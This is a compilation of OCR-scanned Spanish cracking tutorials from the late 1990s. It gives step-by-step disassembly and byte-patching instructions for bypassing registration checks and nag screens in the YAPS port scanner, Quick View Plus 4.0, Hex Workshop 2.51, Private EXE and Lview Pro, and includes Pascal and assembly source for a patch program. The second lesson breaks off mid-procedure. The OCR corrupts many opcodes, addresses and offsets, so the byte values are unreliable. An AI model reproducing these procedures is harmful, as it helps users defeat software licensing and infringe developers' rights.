Tonces que tenemos que hacer?, com oya sabemos la nag es la primer cosa que se abre y generalmente el codigo va a ser uno de los primeros, entonces nos vamos a el principio del codigo: 


PARAR A A 44 44444 ASSEMBLY CODE LISTING 4444444444444 44442 
Jae a oe ae de de oleo oe le le le ol ole e le le Start of Code in Object A IO 
Program Entry Point = 00495EEO0 (virtuosa.exe File Offset:001734E0) 


:00401000 6GAFF push FFFFFFFF 

:00401002 68DAF74C00 push 004CF7DA 

:00401007 64A 100000000 mov eax, dword ptr fs:[00000000] 
:0040100D 50 push eax 

:0040100E 64892500000000 mov dword ptr fs:[00000000], esp 
:00401015 51 push ecx 

:00401016 56 push esi 

:00401017 6A3C push 0000003C 

:00401019 ESE2E00A00 call 004AF100 

:0040101E 8BFO mov esi, eax 

:00401020 83C404 add esp, 00000004 

:00401023 89742404 mov dword ptr [esp+04], esi 
:00401027 33C0 xor eax, eax 

:00401029 3BFO cmp esi, eax 

:0040102B 89442410 mov dword ptr [esp+10], eax 
:0040102F 740F je 00401040 

:00401031 8BCE mov ecx, esi 

:00401033 ESD59C0OA00 call 004AADOD 

:00401038 C70618F04D00 mov dword ptr [esi], 004DF018 
:0040103E 8BC6 mov eax, esi 


Cuantas cosas interesantes para provar, y si noopearamos alguna de esas call? 
Vamos a noopear a esta: 
:00401019 ESE2E00A00 call 004AF100 


Y que paso anduvo? SIMI! !!! 


E-mail: groovy26000 yahoo.com.ar 
WEB: www.zencracking.com.ar 


Como crackear el YAPS! V 1.2 Por gr00Ovy 


Hola gente como les va? A mi bien!!!, Bueno aca estamos de vuelta con un nuevo 
tutorial. Esta ves vamos a crackear un port scanner. 


Bueno manos a la obra! : 


Primero ejecutamos el Programa Yaps!. Analizamos como es, vamos a ingresar un S/N 

y vemos que nos dice ok? 

Bueno, nos dice que esta mal, anotamos esa string y desensamblamos: 

La buscamos y no esta que cagada!!!! Que hacemo? Uhmm pensemos por donde 
podemos atacar ok? 

Ahhh ya se, vemos que tiene en la barra de titulo algo así: 

YAPS - Unregistered 

Esto tiene la pinta de que comprueba un flag que si esta a O esta registrado y si esta a 
1 no lo esta o viceversa. Buscamos en las string references y vemos esto: 


"x11" 

"YAPS - Unregistered" 
"YAPS %d% %" 

"YAPS finishing" 


Hacemos 2 clics en "YAPS - Unregistered" y vemos que hay ok? 


:004039D3 6830CD4000 push 0040CD30 
:004039D8 EBO5 jmp 004039DF 


* Possible StringData Ref from Data Obj ->"YAPS" 


:004039D3 6830CD4000 push 0040CD30 
:004039D8 EBO5 jmp 004039DF 


* Possible StringData Ref from Data Obj ->"YAPS - Unregistered" 


:004039DA 681CCD4000 push 0040CD1C 


Bueno aca hay que usar un poco la cabeza, en la barra de titulo cuando no esta 
registrado aparece "YAPS - Unregistered", yo creo que si estuviera registrado 
apareceria esto que esta en el codgo desensamblado "YAPS" y vemos que antes de esa 
strign hay un ¡mp osea que salta siemp re, y como si fuera magia ese ¡mp es el que 
llama a la cadena de unregistered, asi que lo que podemos hacer es noopear ese ¡mp 
para que llegue siempre a la cadena de YAPS registrado ok? Hasta aca entienden? : ) 
Bueno, probamos y.... no anda! Que habra pasado? Uhmmm no les digo siempre que 

se fijen cuantas referencias a un texto hay?? Y bue hacemos otro doble clic en "YAPS - 
Unregistered" (siempre en la ventana de string references) y vamos a parar aca (no 
hay mas referencias son solo 2): 


:00407538 33C0 xor eax, eax 
:0040753A EBO5 jmp 00407541 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:0040751E(C), :0040752C(C) 


:0040753C 1BCO sbb eax, eax 
:0040753E 83D8FF sbb eax, FFFFEFEFE 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0040753A (U) 


:00407541 85C0 test eax, eax 
:00407543 7464 je 004075A9 
:00407545 8B0DC0DB4000 mov ecx, dword ptr [0040DBC0] 


* Possible StringData Ref from Data Obj ->"YAPS - Unregistered" 


:0040754B 681CCD4000 push 0040CD1C 
:00407550 C744241400000000 mov [esp+14], 00000000 


Uhmm mas o menos lo que vimos antes, la cadena "YAPS - Unregistered" es llamada 
desde: 

* Referenced by a (U)nconditional or (C)onditional Jump at Address: 

:0040753A(U) que si se fijan esta un poquito mas arriba, bueno este salto llama al 
procedimiento de mostrar o no el unregistered, que decimos si lo noopeamos?? Noooo 
si lo noopeamos creo que daria error por que no pondría nada en la barra (creo : ), lo 
que tenemos que hacer es ver que mas hay en este tan interesante codigo y vemos en 
00407543 un je, ejecutemos lon O al salto a verga que pasa ok? Y caemos aca: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00407543(C) 


:004075A9 8B0DC0ODB4000 mov ecx, dword ptr [0040DBC0] 


* Possible StringData Ref from Data Obj ->"YADS" 


:004075AF 6830CD4000 push 0040CD30 


Como vemos, es el mensaje bueno de la barra de titulo asi que vamos y cambiamos el 
je por un jmp que seria un Ebh ok?? 


Y listo el pollo!!! Crackeado!!!! 


Cracker: gr0Ovy 
E-mail: groovy26000yahoo.com.ar 
WEB: www.zencracking.com.ar 
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Trucos para Softlce 


tKC Cracking Tutor, lección 1 


Cuando usas W32Dasm, no consigues números de serie o códigos, te enseña donde o cómo 
puedes cambiar un n” de serie. Esto es lo que hago cuando crackeo programas, este tutorial te 
enseñará como lo hago, paso a paso. Perdón por mis errores gramaticales, espero que entiendas 
este pedazo! 


Herramientas: 
Necesitarás lo siguiente: (Yo usé estas herramientas, y doy por hecho que tú también las usarás): 


- W32Dasm 8.5 o superior. (www.expage.com/page/w32dasm) 


- Hacker's View 5.24 (E.mail: sen Osuslikov.kemerovo.su) 


- Norton Commander o Windows Commander (te explicaré después porque usé esto). 
- Turbo Pascal 7.0 
- TASM é TLINK 3.0 
Pregunta a cualquier cracker donde conseguir estas herramientas, estará dispuesto a servirte! 
Contenidos: 
1) Como crackear Quick Wiew Plus 4.0 
2) Como crackear HEX WorkShop 2.51 


3) Como hacer tus propios parches. 


Parte 1: Quick View Plus 4.0 
- Paso 1.- Ejecuta ORDER32.EXE 


- Paso 2.- Haz clic en $49 licencia simple (también puedes hacer clic en $59), pulsa aceptar, 
y abrir por teléfono (UNLOCK BY PHONE). 


- Paso 3.- Introduce un código para conseguir el mensaje de error (Debes apuntarlo)y sal del 
programa pulsando cancelar. 


- Paso 4.- Ejecuta el Norton Commander, y ve al directorio de QVP. 


- Paso 5.- Copia ORDER32.EXE a ORDER32.EXX (como backup) y copia 
ORDER32.EXE a 1.EXE (para usar con W32Dasm). 


- Paso 6.- Ejecuta el W32Dasm y desensambla 1.EXE 


- Paso 7.- Una vez este desensamblado, pulsa referencia de cadena de datos (STRING 
DATA REFERENCE), busca la cadena (String) “Has introducido un código incorrecto. Por favor 
comprueba tu acceso” (Debes recordar el mensaje de error), y haz doble click sobre él. 


- Paso 8.- Cierra la ventana SDR, y deberías ver la línea: 

* Possible reference to String Resource ID=00041: “You have entered... 
:004049F8 6A29 push 00000029 
:004049FA FF353CCE4000 — push dword ptr [0040CE3C] 


- Paso 9.- OK, ahora debes buscar la última comparación como CMP, JNE, JE, TEST ect. antes 
de la cadena de error. Presiona la flecha hacia arriba hasta que la encuentres. 


:004049CD 755A jne 00404A29 
* Possible reference to String Resource ID=00032: “You must select... 


:004049CF 6420 push 00000020 


* Possible reference to String Resource ID=00040: “Unlock Error” 


- Paso 10.- Ahora sabes a donde se salta cuando introduces un código erróneo. Ahora quieres 
ver si esto funciona cuando cambias “ne” con “je”. Asegúrate que la barra de color verde esta en 
:004049CD 755A jne 0040429, verás la dirección de compensación bajo la pantalla (Ooffset 
00003DCDh). Es donde puedes hacer el parche para ORDER32.EXE. 


- Paso 11.- Vuelve al Norton Commander, ejecuta HIEW ORDER32.EXE, pulsa F4 para 
seleccionar modo descodificador (ASM), pulsa FS y pon 3DCD. Deberías ver algo como: 


00003DCD: 755A jne 000003E29 
00003DCF: 6A20 push 020 
00003DD1: FF15 call w, [di] 


- Paso 12.- Ese es el lugar donde puedes cambiar los bits, pulsa F3, pon 74, pulsa F4 para 
grabar los cambios de ORDER32.EXE y sal de HIEW. 


- Paso 13.- Ejecuta ORDER32.EXE, e introduce cualquier código. Voila! Has crackeado el 
QVP 4.0! Cuidado! Que has introducido los números de serie reales? Esto hará saltar al mensaje 
de error! Ahora que? 


- Paso 14.- Ejecuta otra vez HIEW ORDER32.EXE, pulsa F4, selecciona descodificar, pulsa 
FS y introdúcete en 3DCD. Pulsa F3, introduce EB, y pulsa F9. Esto saltará directamente al 
cuadro de diálogo desbloqueado. 


Parte 2: HEX WorkShop 2.51 


- Paso 1.- Ejecuta HWORKS32.EXE 
- Paso 2.- Pincha la Ayuda, About HEX Workshop. 


- Paso 3.- Introduce cualquier código para conseguir el mensaje de error. Apunta el mensaje y 
sal del programa. 


- Paso 4.- Entra en el Norton Commander, y ve al directorio de HWS. 


- Paso 5.- Copia HWORKS32.EXE a HWORKS32.EXX (como backup) y copia 
HWORKS532.Exe a 1.EXE (para usar con W32Dasm). 


- Paso 6.- Ejecuta el W32Dasm y desensambla 1.EXE. 


- Paso 7.- Una vez este desensamblado, haz click en buscar texto (FIND TEXT). Escribe “You 
have entered an” (recuerda el menasaje de error) para encontrar la línea adecuada. (No la 
encontraras en la ventana SDR!). 


- Paso 8.- Ahora deberías ver estas líneas: 
Name: DialogID_0075, + of Controls=003, Caption:”Registration Unsucce.. 
001-ControlID:FFFF, Control Class:””"Control Text:”You have entered an.. 


002-ControlID:FFFEF, Control Class:””Control Text”Please confirm you... 


- Paso 9.- Bien, ahora sabes que identificación de control (ControlID) se usará cuando 
introduces un código erróneo, pulsa encontrar texto, e introduce “dialogid_0075” hasta encontrar: 


* Possible reference to DialogID_0075 
:0041E233 6A75 push 00000075 
:0041E235 8D8D10FFFFF lea ecx, dword ptr [ebp+FEFC] 


- Paso 10.- Ok, ahora debes buscar la ultima comparación como CMP, JNE, JE, etc. antes del 
diálogo de error. Utiliza la fecla hacia arriba hasta encontrar: 


:0041E145 837DEC00 cmp dword ptr [ebp-14], 00000000 
:0041E149 0F8479000000 je 0041E1C8 
:0041E14F 8B8DFCFEFFEF mov ecx, dword ptr [ebp+FEFC] 


667,9 


- Paso 11.- Ahora quieres ver si el programa funciona cuando cambias “je” por “jne”. 
Asegurate de que la barra verde esta en :0041E149 0F8479000000 je 0041E1C8. Verás la 
dirección de compensación bajo la pantalla, (Offset 0001D549h). Es el lugar donde puedes 
hacer el parche para HWORKS32.EXE. 


- Paso 12.- Vuelve al Norton Commander, ejecuta HIEW HWORKS32.EXE, pulsa F4 para 
seleccionar el modo descodificador (ASM), pulsa F5 e introduce 1D549. Deberías ver: 


0001D549: 0F847900 je  0O0001D5C6 ------=---=----- (1) 
0001D54D: 0000 add [bx] [si], al 
0001D54F: 8B8DFCFE mov cx, [di] [OFEFC] 


- Paso 13.- Aquí es donde puedes cambiar los bits, pulsa F3, introduce 0F845, pulsa F9 para 
guardar los cambios y sal de HIEW. 


- Paso 14.- Ejecuta HWORKS32.EXE e introduce cualquier código, funciona? NO?!? Hehe, no 
te preocupes, vuelve a NC. Copia HWORKS32.EXX a HWORKS32.EXE. (Ahora ves porque 
use la extensión EXX como copia de seguridad). Ahora vuelve a W32Dasm, debes estar en 


donde ya estuvimos antes. (en 0041E145). 

- Paso 15.- Pulsa F3 para buscar otra vez “dialogid_0075”, y debes encontrar: 
* Possible refernce to DialoglID_0075 
:00430ADD 6A75 push 00000075 
:00430ADF 8D8D10FFFFFF lea ecx, dword ptr [ebp+FF10] 


- Paso 16.- Bien, ahora debes buscar la última comparación cmo CMP, JNE, etc. antes del 
diálogo de error. Pulsa la flecha hacia arriba hasta encontrar: 


:004309EF 837DEC00 cmp dword ptr [ebp-14], 00000000 
:004309F3 0F8479000000 je 00430A72 
:004309F9 8BDFCFEFFFF mov ecx, dword ptr [ebp+FEFC] 


667,9 


- Paso 17.- Ahora quieres ver si el programa funciona cuando cambias “je” por “jne”. (Debería 
funcionar) Mueve la barra a :004309F3 OF8479000000 je 00430472. Verás la dirección de 
compensación bajo pantalla, (Offset 0OO2FDF3h). Es donde puedes hacer el parche para 
HWORKS32.EXE. 


- Paso 18.- Vuelve al Norton Commander, ejecuta HIEW HWORKS32.EXE, pulsa F4 para 
seleccionar el modo descodificador (ASM), pulsa F5 y escribe 2FDF3. Deberías ver: 


0002FDF3: 0F847900 je DO000IDSC6 noo (1) 
0002FDF7: 0000 add [bx] [si], al 
0002FDF9: 8B8DFCFE mov cx, [di] [OFEFC] 


- Paso 19.- Aquí es donde puedes cambiar los bits, pulsa F3, introduce OF85, pulsa F9 para 
guardar los cambios y sal de HIEW. 


- Paso 20.- Ejecuta otra vez HWORKS32.EXE e introduce cualquier código, funciona? Voila!! 
Felicidades! Has crackeado HEX WorkShop 2.51! 


Parte 3: Parches 


Aquí esta el origen del código para Pascal: 


Const A: Array[1..1] of Record (<-------- 1 byte to be patched] 
A : Longint; 


B : Byte; 


End = 


((A:$3DCD;B:SEB)); ([ <----=--======-- offset "3DCD" and byte "EB" to be changed) 


Var Ch:Char; 
I:Byte; 
F:File; 
FN:file of byte; 


Size:longint; 


Begin 


Writeln(TKC"s Little Patch');writeln(Crack for QVP 4.0 by TKC/PC "97'); 
Assign(F,ORDER32.EXE); [ <--=--===-=---- filename to be patched) 
[SI-) Reset(F, 1); (SI+-) 
If TOResult <> O then 
begin 
writeln('File not found!”); 
halt(); 
end; 
For I:=1 to 1 d0 [<= 1 byte to be patched) 
Begin 
Seek(F,A[I].A); 
Ch:=Char(A[I].B); 
Blockwrite(F,Ch, 1); 


End; 


Writeln('File successfully patched!'); 


Aquí esta el origen del código para el ensamblador: 


DOSSEG 

.MODEL SMALL 

STACK 500h 

DATA 

.CODE 

PatchL EQU 6 

Buffer Db PatchL Dup(1) 
handle dw ? 


intro db "TKC's Little Patch",0dh,0ah,"Crack for QVP 4.0 by TKC/PC '97$" 


FileName db "ORDER32.EXE",0 ;<------- filename to be patched 
notfound db Odh,0ah,"File not found!$" 
cracked db Odh,O0ah,"File successfully patched. Enjoy!$" 


Cant db Odh,0ah,"Can't write to file.$" 


Done db "File has been made.$" 


String db OEBh,0 ;<----=-=------- byte "EB" to be patched 


START: 


mov  ax,cs 


mov  ds,ax 


mov  dx,offset intro  ;point to the time prompt 


mov  ah,9 ¿DOS: print string 


int 21h 


jmp openfile 


openfile: 


mov  ax,cs 


mov  ds,ax 


mov  ax,3d02h 


mov  dx,offset FileName 


int 21h 


mov  handle,ax 


cmp  ax,02h 


je  filedontexist 


jmp write 


filedontexist: 


mov ax,Cs 


mov  ds,ax 


mov  dx,offset notfound 


mov  ah,9 ¿DOS: print string 

int 21h ¡display the time prompt 
jmp exit 

Write: 


mov  bx,handle 


mov  cx,0000h 


mov  dx,3DCDHh ;<-----=====--- offset "3DCD" 


mov ax,4200h 


int 21h 


mov  cx,patchl 


mov  dx,offset String 


mov  ah,40h 


mov  cx,0l1h 


int 21h 


mov ax,Cs 


mov  ds,ax 


mov  dx,offset cracked 


mov  ah,9 ¿DOS: print string 

int 21h ¡display the time prompt 
jmp Exit 

Exit: 


mov  ah,3eh 
int 21h 

mov  ax,4c00h 
int 21h 


END START 


Últimas palabras: 


Aquí tienes algunas de las palabras más usuales que usamos para crackear: 


ME E UE 
EB - salta directamente a..... 


a e ingún funcionamiento (No 
OPeration) 

77 O0FE7 ja salta si es superior 

086 ja salta si no superior 

res jas salta s1 es superior o 1gual 

082 me salta si no está sobre o igual 

082 o salta si está debajo 

083 salta si no está debajo 

086 be salta si está debajo o 1gual 

DET be salta si no está debajo o igual 

A salta si es mayor 

OFSE salta si no es mayor 

O salta si es mayor o igual 

rec ge salta si no es mayor o igual 

0rsc salta si es menor 

¿A salta si no es menor 


eE je saltansiesmenoroigual | si es menor o saltan si es menor o igual 
OF8F IEEE EE saltan si no es menor o igual 


Tu “poco” conocimiento sobre ensamblar te ayudará más de un poco, pero no lo necesitarás para 


Softlce. De todas formas puedes crackear fragmentos usando W32Dasm como un maníaco. No 
podrás desensamblar programas de Visual Basic, para lo que necesitarías desensambladores de 
Visual Basic. 


Suficiente por ahora. La próxima vez te contare más sobre como usar W32Dasm como depurador 
de errores (Debugger mode) y como eliminar NAGS. Luego, despues de eso, escribiré un tutorial 
para Soft-ICE 3.0. 


(Make my day!) J 


Que te diviertas! 
The Keyboard Caper, 
El fundador de PhRoZeN CreW “94 - “97 


19-7-1997 


tKKC CRACKING TUTOR, LECCIÓN 2 


Hi dudes! 


Ahora que he vuelto al tutorial del cracker, me gustaría enseñarte como eliminar NAG's y como 
usar el modo depurador de errores (Debugger mode) en W32Dasm, es realmente fácil!! 


Ok, vamos! 
Herramientas: 
Necesitarás lo siguiente: (Yo usé estas herramientas, y doy por hecho que tú también las usarás): 


- W32Dasm 8.9 o superior (www.expage.com/page/w32dasm) 


- Hacker's View 5.60 (E-mail: sen Osuslikov.kemerovo.su) 


- Norton Commander o Windows Commander 


Contenidos: 
1) a. Como eliminar NAG's en Private EXE 2.0a (usando el Debugger en W32Dasm) 


b. Como eliminar NAG's en Private EXE 2.0a (sin W32Dasm!) 


2) a. Como eliminar NAG's en Lview Pro 1.C/32 (usando el Debugger en W32Dasm) 


b. Como crackear Lview Pro 1.C/32 (introduciendo cualquier n?) 


(Como no dispongo de modem hasta dentro de un tiempo, no pude grabar la ultima versión 
shareware, así que usé viejos programas para la demostración). 


Parte 1.a: Eliminar NAG's en Private EXE 2.0a (con W32Dasm) 
- Paso 1.- Ejecuta PEXE32.EXE 


- Paso 2.- Ahora ves una de esas irritantes pantallas con un NAG, te gustaría eliminar ese 
NAG, ehh? 


- Paso 3.- Ok, sal del programa. 
- Paso 4.- Ejecuta el Norton Commander, y ve al directorio de PrivateEXE. 


- Paso 5.- Copia PEXE2.EXE a PEXE2.EXX (como backup) y copia PEXE32.EXE a 1.EXE 
(para usar con W32Dasm). 


- Paso 6.- Ejecuta W32Dasm y desensambla 1.EXE 


- Paso 7.- Una vez desensamblado, pincha Debug/Load Process (o pulsa CTRL-L). 


Paso 8.- Espera mientras que el debugger acaba de cargar todas las DLE'Ss. 
- Paso 9.- Ok, ahora estas en la ventana del “debug”, deberías ver la barra en: 
:004074B0 mov eax, dword ptr fs: [00000000] 


:004074B6 push ebp 


Paso 10.- Estas en el punto de entrada del programa. Ok, estas preparado para ejecutar Private 
EXE, haz click en ejecutar (RUN) o pulsa F9. Ahora veras esa pantalla con el Nag, y te gustaría 


saber de donde procede. Presiona “seguir el rastro” (Step into) o pulsa F7. Ah! Ahora ves lo 
siguiente: 


:00405C21 call USER32.DialogBoxParamA 


:00405C27 pop ebp 


Paso 11.- Pulsa terminar, lo que cerrará las ventanas del debugger y Private EXE. 
- Paso 12.- Deberías estar de vuelta en el W32Dasm y ver lo siguiente: 

:00405C21 FF1590664100 Call dword ptr [00416690] 

:00405C27 5D pop ebp 


:00405C28 C3 ret 


Paso 13.- Ok, ahora debes comprobar donde empieza el proceso de diálogos. Pulsa la flecha 
hacia arriba hasta encontrar: 


:00405BFC CC int 03 
:00405BFD CC int 03 


:00405BFE CC int 03 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


1:00401064 (U) 


:00405BFF 55 push ebp 


:00405C00 8B442414 mov eax, dword ptr [esp+14] 


- Paso 14.- Estas CC's (int 03), son donde empieza el proceso de diálogo. Asegurate de que la 
barra cyan esta en :00405BFF 55 push ebp. Verás la dirección de compensación bajo la pantalla, 
(Offset 0O004FFFh). Es donde puedes hacer el parche para PEXE32.EXE. 


- Paso 15.- Vuelve al Norton Commander, ejecuta HIEW PEXE32.EXE, pulsa F4 para 
seleccionar modo descodificador (ASM), pulsa FS y escribe 4FFF. Deberías ver algo como: 


00005BFF: 55 push ebp 
00005C00: 8B442414 mov  eax,[esp][00014] 
00005C04: 8BEC mov  ebp,esp 


00005C06: 85C0 test  eax,eax 


(Recuerda, estoy usando HIEW 5.60 ahora, el cual enseña la dirección de compensación, esta 
versión es impresionante, grabala!!) 


- Paso 16.- Este es el lugar donde puedes cambiar los bits, pulsa F3, pon C3, y pulsa F9 para 
guardar los cambios en PEXE32.EXE. Despues de esto deberías ver lo siguiente: 


00004FFF: C3 retn 
00005000: 8B442414 mov eax,[esp][00014] 
00005004: 8BEC mov ebp,esp 
00005006: 85C0 test eax,eax 


- Paso 17.- Por qué C3? Ah, cuando el programa empieza aquí, en C3 (retn), no continuará con 
el proceso de diálogos porque tu le dijiste que volviera! 


- Paso 18.- Ahora ejecuta PEXE32.EXE, ves esa pantalla con el NAG? No!!! Has crackeado el 
Private EXE 2.0a!! 


A propósito, esto no es 100% crack (es bordear la protección mediante password), solo te mostré 
como eliminar NAGs, recuerdas? ] 


Parte 1.b: eliminar NAGs en Private EXE 2.0a (sin W32Dasm) 
(Yo siempre usé esta parte porque es más fácil y rápida). 
- Paso 1.- Ejecuta PEXE32.EXE 


- Paso 2.- Ahora ves uno de esos malditos NAG's y te quieres deshacer de el, no? 


- Paso 3.- Bien, sal del programa. 
- Paso 4.- Ejecuta el Norton Commander, y ve al directorio de Private. 
- Paso 5.- Copia PEXE32.EXE a PEXE32.EXX y ejecuta HIEW PEXE32.EXE. 


- Paso 6.- Pulsa F4 para seleccionar el modo HEX, ahora veras la mierda HEX de 
PEXE32.EXE. No necesitas mearte los calzoncillos! 


- Paso 7.- Recuerdas que majadería decia el NAG? Ah, tenías que haberlo apuntado al ejecutar 
PEXE32.EXE. Es algo así como “PrivateEXE is NOT a free software. It is comercial...” o “Ok, I 
agree...” ect ect. 


- Paso 8.- Pulsa F7 para buscar, introduce “agree” (en alfabeto ASCII). Encuentras la cadena? 
Ok, recuerda que PEXE32.EXE es un fichero de un programa de 32 bits, así que usará la cadena 
“00” entre cada carácter como “a g r e e” (sin espacio entre caracteres!). 


- Paso 9.- Pulsa F7 de nuevo, escribe “a” (en ASCH), pulsa la flecha abajo, introduce “00” (en 


66,9 


HEX), pulsa arriba, escribe “g”, pulsa abajo, “00”, arriba, *r”, abajo “00”, arriba, “e”, abajo “00”, 
arriba “e”. Deberías ver lo siguiente: 


ILERARRARRARARRRRARRARRRA 


ÉÍ[F2:Forward /F4:Fal JAN... 


o ASCII: a g re er 92920290098 


* Hex: 61 00 67 00 72 00 65 00 65 92009009... 
EAN... 
- Paso 10.- Bien, pulsa intro para encontrar esta cadena. Ahora verás lo siguiente: 
.00019300: 00 00 FO 00-14 01 00 00-00 00 41 00-62006F00 Y Abo 


.00019310: 75 00 74 00-20 00 50 00-72 00 69 00-76006100 ut Priva 


00019320: 74 00 65 00-45 00 58 00-45 0000 00-08004D00. teEXE M 


.00019330: 53 00 20 00-53 00 61 00-6E 00 7300-20005300  S Sans S 
.00019340: 65 00 72 00-69 00 66 00-00 0000 00-01000150  erif P 
.00019350: 00 00 00 00-19 00 EA 00-54 00 0E 00-01 00 FFFF — ¿Z yy 
00019360: 80 00 26 00-4F 00 6B 00-2C 00 20 00-49 00 20 00 S£Ok, I 
.00019370: 61 00 67 00-72 00 65 00-65 0000 00-00000000 agree 
.00019380: 00 00 01 50-00 00 00 00-7B 00 EA 00-5A000E00 P (éZ 
.00019390: 65 00 FF FF-80 00 4F 00-72 00 64 00-65007200  eyy Order 


.000193A0: 69 00 6E 00-67 00 20 00-26 00 49 00-6E006600 ing ¿In 


- Paso 11.- “Ok, l agree”, “Ordering” etc, son botones, ahora ve hacia arriba hasta encontrar: 
.00019420: 81 00 02 50-00 00 00 00-11 00 9E 00-CC 002100 +[1]P z1! 
.00019430: FF FF FF FF-82 00 50 00-72 00 69 00-76 006100  yyyy-Priva 
.00019440: 74 00 65 00-45 00 58 00-45 00 20 00-69007300  teEXE is 
.00019450: 20 00 4E 00-4F 00 54 00-20 00 61 00-20 00 66 00 NOT a f 
.00019460: 72 00 65 00-65 00 20 00-73 00 6F 00-66007400 ree soft 
.00019470: 77 00 61 00-72 00 65 00-2E 00 20 00-49 007400 ware. It 
.00019480: 20 00 69 00-73 00 20 00-63 00 6F 00-6D006D00 ¡is comm 
.00019490: 65 00 72 00-63 00 69 00-61 006C 00-20007000  ercial p 


- Paso 12.- Mira a FF FF FF FF 82, justo antes de la cadena “Private EXE in NOT a..” es donde 
se generaran los diálogos, recuerda, solo 4 FF's y 82 bytes harán el engaño! Ahora usa las flechas 
para situarte en “82”. Veras “19434” bajo la pantalla, ahora pulsa F3 y cambia “82” por *7E”, 


mira bajo la pantalla, estas en la dirección de compensación 14A34. Es donde puedes poner el 
parche. Pulsa F9 para grabar los cambios. 


- Paso 13..- Recuerda, solo 4 FF's y 82 bits lo harán trabajar de otra manera puedes joder tu 
culo. Ahora que has cambiado “82” por “7E”, no se generaran más diálogos. Sal de HIEW y 
ejecuta PEXE32.EXE. 


- Paso 14.- Ves ese horrible NAG? No!! Has crackeado el Private EXE 2.0a!!. 


Parte 2.a: Eliminar NAG's Lview Pro 1.C/32 (con W32Dasm) 
- Paso 1.- Ejecuta LVIEWPRO.EXE. 

- Paso 2.- Ahora ves esa horrible pantalla con un NAG, te gustaría eliminarlo, no? 
- Paso 3.- Ok, sal del programa. 

- Paso 4.- Ejecuta el Norton Commander, y ve al directorio de Lview PRO. 


- Paso 5.- Copia LVIEWPRO.EXE a LVIEWPRO.EXX (como copia de seguridad) y copia 
LVIEWPRO.EXE a 1.EXE (para usar con W32Dasm). 


- Paso 6.- Ejecuta W32Dasm y desensambla 1.EXE. 

- Paso 7.- Una vez desensamblado, pincha en Debug/ Load Process (o pulsa CRTL-L). 

- Paso 8.- Espera mientras que el debugger es acabado con la carga de DDLSs. 

- Paso 9.- Bien, ahora estas en la ventana del “debug”, deberías ver la barra en: 
:00450236 mov eax, dword ptr fs: [00000000] 


:0045023C push ebp 


- Paso 10.- Es el punto de entrada del programa. Bien, ahora estas preparado para ejecutar 
Lview PRO, pulsa EJECUTAR o F9. Ves esa pantalla con el NAG, te gustaría saber donde 
empieza el proceso del NAG. Pulsa “Seguir rastro” (o pulsa F7). Ah!. Deberías ver lo siguiente: 


:004324F1 cmp eax, FEFFFFFF 


:004324F4 ¡ne 00432508 


- Paso 11.- Pulsa terminar, se cerrarán las ventanas del debugger y Lview Pro. 
- Paso 12.- Debes volver a W32Dasm y ver lo siguiente: 
:004324F1 83F8SFF cmp eax, FFFFFFFF 


:004324F4 7512 jne 00432508 


- Paso 13.- Ok, ahora debes comprobar donde empieza el proceso de diálogos. Pulsa la flecha 
hacia arriba hasta encontrar: 


:004323ED CC int 03 
:004323EE CC int 03 
:004323EF CC int 03 


* Referenced by a CALL at Address: 


|:00407EEC 


:004323F0 83EC78 sub esp, 00000078 


:004323F3 56 push esi 


- Paso 14.- Las CC's (int 03), es donde empieza el proceso de diálogos. Asegurate de que la 
barra de color cyan esta en :004323F0 83Ec78 sub esp, 00000078. Verás la dirección de 
compensación bajo la pantalla, (Offset 000317FOh). Es donde puedes hacer el parche para 
LVIEWPRO.EXE 


- Paso 15.- Vuelve al Norton Commander, ejecuta HIEW LVIEWPRO.EXE, pulsa F4 para 
seleccionar modo descodificador (Decode mode) (ASM), pulsa F5 y escribe 317F0. Deberías ver 
algo como: 


.000323FO: 83EC78 sub esp,078 ;"x" 

.000323F3: 56 push  esi 
.000323F4: 8BB42480000000 mov  esi,[esp][000000080] 
.000323FB: 85F6 test esi,esl 


(Recuerda, estoy usando HIEW 5.60, que te enseña la dirección de compensación, esta versión es 
impresionante, grabala!!!). 


- Paso 16.- Aquí es donde puedes cambiar los bits, pulsa F3, introduce C3, pulsa F9. Cuando 
has pulsado F3 y has introducido C3, debiste ver: 


000317F0: C3 retn 
000317F1: EC in al,dx 


000317F2: 7856 js 00003184A 


0003 17F4: 8B B42480000000 mov es1,[esp][000000080] 
000317FB: 85F6 test esl,esi 


- Paso 17.- Por que C3? Ah, cuando el programa empieza aquí en C3 (retn), no continuará con 
el proceso de diálogos porque tu le dijiste que volviera! 


- Paso 18.- Ahora ejecuta LVIEWPRO.EXE, Ves ese horrible NAG? No!! Has crackeado 
Lview Pro 1.C/32!! 


Y ahora aquí tines otra forma de eliminar esos NAG's, quieres probar esto? Ok, vuelve al primer 
paso, y sigue los demás hasta el 15, y haz los siguientes pasos: 


- Paso 19.- Ahora estas en la dirección de compensación 317FO0, te gustaría saber donde 
empieza este proceso. Pulsa F6 (lo que encontrara la referencia o actual posición), deberías ver 
los siguiente: 


.00007EEC: ESFFA40200 call .0000323F0 ---------- (6) 
.00007EF1: 83C404 add  esp,004 

.00007EF4: 33C0 xor €eax,eax 

.00007EF6: E9320D0000 jmp .000008C2D ---------- (7) 


- Paso 20.- Ah, ahora sabes donde comienza el proceso de diálogos. Pulsa F3, y escribe 
9090909090, y pulsa F9 para grabar los cambios. Deberías haber algo como esto: 


000072EC: 90 nop 
000072ED: 90 nop 
000072EE: 90 nop 
000072EF: 90 nop 
000072FO: 90 nop 


000072F1: 83C404 add  esp,004 


000072F4: 33C0 xor €eax,eax 


- Paso 21.- Estos 9090909090 bits harán que no comienze el proceso. Ahora ejecuta 
LVIEWPRO.EXE, ves ese NAG?NO!! Has crackeado Lview Pro 1.C/32!! 


Parte 2.b: Como crackear Lview Pro 1.C/32 (introduciendo cualquier 
n” de serie) 


- Paso 1.- Ejecuta LVIEWPRO.EXE. 


- Paso 2.- Pulsa en Registrarse, entonces me registro... luego el nombre: escribe “TKC/PC “97” 
y en FID: escribe “12345”. 


- Paso 3.- Ahora veras el mensaje de error. (Apuntalo) Y sal del programa. 
- Paso 4.- Ejecuta el Norton Commander, y ve al directorio de LVP. 


- Paso 5.- Copia LVIEWPRO.EXE a LVIEWPRO.EXX (como backup) y copia 
LVIEWPRO.EXE a 1.EXE (para usar con W32Dasm). 


- Paso 6.- Ejecuta W32Dasm y desensambla 1.EXE. 


